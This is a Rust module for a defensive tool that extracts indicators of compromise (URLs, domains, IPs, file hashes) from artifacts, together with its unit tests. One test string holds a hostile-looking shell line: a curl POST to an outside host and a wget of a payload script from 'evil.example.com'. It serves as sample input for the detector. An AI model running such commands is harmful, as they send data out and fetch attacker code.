use crate::lazy_pattern;
use serde::{Deserialize, Serialize};
use sha2::{Digest, Sha256};
use std::collections::BTreeSet;
use std::path::{Path, PathBuf};
lazy_pattern!(URL_PATTERN, r#"https?://[^\s"'<>`\{\}\[\]\(\)\\]{3,512}"#);
lazy_pattern!(
IPV4_PATTERN,
r"\b(?:(?:25[0-5]|2[0-4]\d|[01]?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|[01]?\d?\d)\b"
);
lazy_pattern!(
IPV6_PATTERN,
r"\b(?:(?:[A-Fa-f0-9]{1,4}:){1,7}(?::[A-Fa-f0-9]{1,4}){1,7}|(?:[A-Fa-f0-9]{1,4}:){7}[A-Fa-f0-9]{1,4})\b"
);
lazy_pattern!(
HOST_MENTION_PATTERN,
r"\b([a-z0-9](?:[a-z0-9\-]{0,61}[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9\-]{0,61}[a-z0-9])?)+\.(?:com|net|org|io|dev|ai|fly\.dev|vercel\.app|co|me|xyz|app|cloud|tech|info|biz|pro|us|uk|de|fr|es|it|ru|cn|jp|hk|tw|kr|sg|in|br|mx|ca|au|nz|za|ae|tr|il|ch|nl|be|se|no|fi|dk|pl|ir|pk|sa|eg|th|vn|ph|id|my|ng))\b"
);
#[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize)]
pub struct ExtractedIocs {
pub urls: Vec<String>,
pub domains: Vec<String>,
pub ipv4: Vec<String>,
pub ipv6: Vec<String>,
pub file_hashes: Vec<FileHash>,
}
#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
pub struct FileHash {
pub path: PathBuf,
pub sha256: String,
}
impl ExtractedIocs {
pub fn is_empty(&self) -> bool {
self.urls.is_empty()
&& self.domains.is_empty()
&& self.ipv4.is_empty()
&& self.ipv6.is_empty()
&& self.file_hashes.is_empty()
}
pub fn merge(&mut self, other: ExtractedIocs) {
fn merge_sorted(target: &mut Vec<String>, additions: Vec<String>) {
let mut set: BTreeSet<String> = target.drain(..).collect();
set.extend(additions);
*target = set.into_iter().collect();
}
merge_sorted(&mut self.urls, other.urls);
merge_sorted(&mut self.domains, other.domains);
merge_sorted(&mut self.ipv4, other.ipv4);
merge_sorted(&mut self.ipv6, other.ipv6);
let mut seen: BTreeSet<(PathBuf, String)> = self
.file_hashes
.drain(..)
.map(|h| (h.path, h.sha256))
.collect();
for h in other.file_hashes {
seen.insert((h.path, h.sha256));
}
self.file_hashes = seen
.into_iter()
.map(|(path, sha256)| FileHash { path, sha256 })
.collect();
}
}
const NOISE_DOMAINS: &[&str] = &[
"localhost",
"localhost.localdomain",
"example.com",
"example.org",
"example.net",
"test.com",
"invalid",
];
const NOISE_IPV4_PREFIXES: &[&str] = &[
"127.", "0.0.0.0", "10.", "192.168.", "169.254.", ];
const KEEP_SPECIAL_IPV4: &[&str] = &[
"169.254.169.254", ];
pub const MAX_IOCS_PER_KIND_PER_ARTIFACT: usize = 4_096;
pub fn extract_from_artifact(path: &Path, content: &[u8]) -> ExtractedIocs {
let mut out = if let Ok(text) = std::str::from_utf8(content) {
extract_from_text(text)
} else {
let lossy = String::from_utf8_lossy(content);
extract_from_text(&lossy)
};
out.file_hashes.push(FileHash {
path: path.to_path_buf(),
sha256: sha256_hex(content),
});
out
}
pub fn extract_from_text(text: &str) -> ExtractedIocs {
let mut urls: BTreeSet<String> = BTreeSet::new();
let mut domains: BTreeSet<String> = BTreeSet::new();
let mut ipv4: BTreeSet<String> = BTreeSet::new();
let mut ipv6: BTreeSet<String> = BTreeSet::new();
fn try_insert_bounded(set: &mut BTreeSet<String>, value: String, kind: &'static str) -> bool {
if set.len() >= MAX_IOCS_PER_KIND_PER_ARTIFACT {
tracing::warn!(
kind,
cap = MAX_IOCS_PER_KIND_PER_ARTIFACT,
"ioc_extraction: per-artifact IOC cap reached; truncating further matches"
);
return false;
}
set.insert(value);
true
}
for m in URL_PATTERN.find_matches(text) {
let raw = m.matched_text.as_str();
let trimmed = raw.trim_end_matches([',', '.', ';', ':', ')', ']', '}', '!', '?']);
if !try_insert_bounded(&mut urls, trimmed.to_string(), "url") {
break;
}
if let Some(host) = extract_host_from_url(trimmed) {
if !is_noise_domain(&host) && !is_ipv4(&host) && !is_ipv6(&host) {
if domains.len() < MAX_IOCS_PER_KIND_PER_ARTIFACT {
try_insert_bounded(&mut domains, host, "domain");
}
}
}
}
for m in HOST_MENTION_PATTERN.find_matches(text) {
let host = m.matched_text.to_ascii_lowercase();
if !is_noise_domain(&host) && !try_insert_bounded(&mut domains, host, "domain") {
break;
}
}
for m in IPV4_PATTERN.find_matches(text) {
let ip = m.matched_text.as_str();
if !is_noise_ipv4(ip) && !try_insert_bounded(&mut ipv4, ip.to_string(), "ipv4") {
break;
}
}
for m in IPV6_PATTERN.find_matches(text) {
let ip = m.matched_text;
if ip.matches(':').count() >= 2
&& is_plausible_ipv6(&ip)
&& !try_insert_bounded(&mut ipv6, ip, "ipv6")
{
break;
}
}
ExtractedIocs {
urls: urls.into_iter().collect(),
domains: domains.into_iter().collect(),
ipv4: ipv4.into_iter().collect(),
ipv6: ipv6.into_iter().collect(),
file_hashes: Vec::new(),
}
}
fn extract_host_from_url(url: &str) -> Option<String> {
let after_scheme = url.split_once("://").map(|(_, rest)| rest)?;
let no_userinfo = after_scheme
.split_once('@')
.map_or(after_scheme, |(_, h)| h);
let end = no_userinfo
.find(['/', '?', '#'])
.unwrap_or(no_userinfo.len());
let host_port = &no_userinfo[..end];
let host = if host_port.starts_with('[') {
host_port
.split(']')
.next()
.map(|s| s.trim_start_matches('['))
} else {
host_port.split(':').next()
};
host.map(|h| h.to_ascii_lowercase())
.filter(|h| !h.is_empty())
}
fn is_noise_domain(domain: &str) -> bool {
let d = domain.to_ascii_lowercase();
NOISE_DOMAINS.iter().any(|n| d == *n)
}
fn is_noise_ipv4(ip: &str) -> bool {
if KEEP_SPECIAL_IPV4.contains(&ip) {
return false;
}
if ip == "0.0.0.0" {
return true;
}
if NOISE_IPV4_PREFIXES
.iter()
.any(|prefix| ip.starts_with(prefix))
{
return true;
}
is_rfc1918_172(ip)
}
fn is_rfc1918_172(ip: &str) -> bool {
let mut parts = ip.split('.');
let (Some(a), Some(b)) = (parts.next(), parts.next()) else {
return false;
};
if a != "172" {
return false;
}
matches!(b.parse::<u8>(), Ok(16..=31))
}
fn is_ipv4(s: &str) -> bool {
IPV4_PATTERN.is_match(s) && s.matches('.').count() == 3
}
fn is_ipv6(s: &str) -> bool {
s.matches(':').count() >= 2 && IPV6_PATTERN.is_match(s) && is_plausible_ipv6(s)
}
fn is_plausible_ipv6(s: &str) -> bool {
if s.contains("::") {
return true;
}
let groups: Vec<&str> = s.split(':').collect();
groups.len() == 8 && groups.iter().all(|g| !g.is_empty() && g.len() <= 4)
}
fn sha256_hex(bytes: &[u8]) -> String {
let mut hasher = Sha256::new();
hasher.update(bytes);
format!("{:x}", hasher.finalize())
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn extract_from_text_caps_url_count_per_artifact() {
let mut text = String::new();
let target = MAX_IOCS_PER_KIND_PER_ARTIFACT + 256;
for n in 0..target {
use std::fmt::Write;
let _ = writeln!(text, "see https://example-{n}.test/ for details");
}
let iocs = extract_from_text(&text);
assert!(
iocs.urls.len() <= MAX_IOCS_PER_KIND_PER_ARTIFACT,
"URL set must be capped at {}; got {}",
MAX_IOCS_PER_KIND_PER_ARTIFACT,
iocs.urls.len()
);
}
#[test]
fn extracts_urls_and_domains_from_script() {
let text = "curl -s -X POST http://sphinx.espuny.net:5000/v1/audio ; wget https://evil.example.com/payload.sh";
let iocs = extract_from_text(text);
assert!(iocs
.urls
.iter()
.any(|u| u.starts_with("http://sphinx.espuny.net:5000")));
assert!(iocs
.urls
.iter()
.any(|u| u.starts_with("https://evil.example.com")));
assert!(iocs.domains.contains(&"sphinx.espuny.net".to_string()));
assert!(iocs.domains.iter().any(|d| d == "evil.example.com"));
}
#[test]
fn filters_loopback_and_private_ips() {
let text = "target = 127.0.0.1 fallback = 10.0.0.5 router = 192.168.1.1 public = 8.8.8.8 imds = 169.254.169.254";
let iocs = extract_from_text(text);
assert!(iocs.ipv4.contains(&"8.8.8.8".to_string()));
assert!(iocs.ipv4.contains(&"169.254.169.254".to_string())); assert!(!iocs.ipv4.contains(&"127.0.0.1".to_string()));
assert!(!iocs.ipv4.contains(&"10.0.0.5".to_string()));
assert!(!iocs.ipv4.contains(&"192.168.1.1".to_string()));
}
#[test]
fn is_noise_ipv4_covers_full_rfc1918_172_12_block() {
for ip in [
"172.16.0.1",
"172.17.0.1", "172.18.0.42",
"172.20.5.5",
"172.31.255.255",
] {
assert!(
is_noise_ipv4(ip),
"172.16.0.0/12 must be filtered; failed for {ip}"
);
}
for ip in ["172.15.0.1", "172.32.0.1", "172.0.0.1"] {
assert!(
!is_noise_ipv4(ip),
"{ip} is outside RFC1918 172.16.0.0/12 and must NOT be filtered"
);
}
}
#[test]
fn extract_filters_full_rfc1918_172_12_block_e2e() {
let text =
"docker = 172.17.0.5 internal = 172.20.1.1 public = 9.9.9.9 edge = 172.32.0.1";
let iocs = extract_from_text(text);
assert!(!iocs.ipv4.contains(&"172.17.0.5".to_string()));
assert!(!iocs.ipv4.contains(&"172.20.1.1".to_string()));
assert!(iocs.ipv4.contains(&"9.9.9.9".to_string()));
assert!(iocs.ipv4.contains(&"172.32.0.1".to_string()));
}
#[test]
fn ipv6_extraction_rejects_unbounded_hex_runs_in_identifiers() {
let text = "token=xabc1:abc2:abc3:abc4:abc5:abc6:abc7:abc8x more text";
let iocs = extract_from_text(text);
assert!(
iocs.ipv6.is_empty(),
"IPv6 must NOT match inside identifier word characters; got {:?}",
iocs.ipv6
);
}
#[test]
fn ipv6_extraction_rejects_short_hex_token_lacking_double_colon() {
let text = "session = abc1:def2:1234:5678 next";
let iocs = extract_from_text(text);
assert!(
iocs.ipv6.is_empty(),
"4-group hex-colon token without `::` must NOT extract as IPv6; got {:?}",
iocs.ipv6
);
}
#[test]
fn ipv6_extraction_keeps_valid_addresses() {
let text = "endpoint = 2001:db8::dead:beef:1; alt = fe80::1";
let iocs = extract_from_text(text);
assert!(
iocs.ipv6.iter().any(|i| i.contains("2001:db8")),
"Valid IPv6 must still match; got {:?}",
iocs.ipv6
);
}
#[test]
fn is_plausible_ipv6_rejects_overlong_groups() {
assert!(!is_plausible_ipv6(
"aaaaa:bbbb:cccc:dddd:eeee:ffff:1111:2222"
));
}
#[test]
fn is_plausible_ipv6_accepts_compressed_form() {
assert!(is_plausible_ipv6("2001:db8::1"));
assert!(is_plausible_ipv6("fe80::1"));
}
#[test]
fn is_plausible_ipv6_accepts_full_8_group_form() {
assert!(is_plausible_ipv6("2001:0db8:85a3:0000:0000:8a2e:0370:7334"));
}
#[test]
fn hashes_artifact_content() {
let iocs = extract_from_artifact(Path::new("script.sh"), b"hello world");
assert_eq!(iocs.file_hashes.len(), 1);
assert_eq!(
iocs.file_hashes[0].sha256,
"b94d27b9934d3e08a52e52d7da7dabfac484efe37a5380ee9088f7ace2efcde9"
);
}
#[test]
fn ipv6_basic_extraction() {
let text = "endpoint = 2001:db8::dead:beef:1";
let iocs = extract_from_text(text);
assert!(iocs.ipv6.iter().any(|i| i.contains("2001:db8")));
}
#[test]
fn deduplicates_and_sorts() {
let text = "https://a.com/x https://a.com/y https://a.com/x 8.8.8.8 8.8.4.4 8.8.8.8";
let iocs = extract_from_text(text);
assert_eq!(
iocs.ipv4,
vec!["8.8.4.4".to_string(), "8.8.8.8".to_string()]
);
assert!(iocs.urls.len() >= 2);
}
#[test]
fn merge_combines_disjoint_lists() {
let mut a = extract_from_text("https://foo.com/x 1.1.1.1");
let b = extract_from_text("https://bar.io/y 8.8.8.8");
a.merge(b);
assert!(a.domains.contains(&"foo.com".to_string()));
assert!(a.domains.contains(&"bar.io".to_string()));
assert!(a.ipv4.contains(&"1.1.1.1".to_string()));
assert!(a.ipv4.contains(&"8.8.8.8".to_string()));
}
#[test]
fn does_not_flag_programming_identifiers_as_domains() {
let text = "object.method.name = func.call() # not a host";
let iocs = extract_from_text(text);
assert!(
iocs.domains.is_empty(),
"got false-positive: {:?}",
iocs.domains
);
}
#[test]
fn domain_cap_does_not_spam_repeated_warns() {
let mut text = String::new();
let target = MAX_IOCS_PER_KIND_PER_ARTIFACT + 100;
for n in 0..target {
use std::fmt::Write;
let _ = writeln!(text, "see https://unique-{n}.example.com/");
}
let iocs = extract_from_text(&text);
assert!(
iocs.domains.len() <= MAX_IOCS_PER_KIND_PER_ARTIFACT,
"domain set must be capped at {}; got {}",
MAX_IOCS_PER_KIND_PER_ARTIFACT,
iocs.domains.len()
);
assert!(
iocs.urls.len() <= MAX_IOCS_PER_KIND_PER_ARTIFACT,
"URL set must also be capped; got {}",
iocs.urls.len()
);
}
}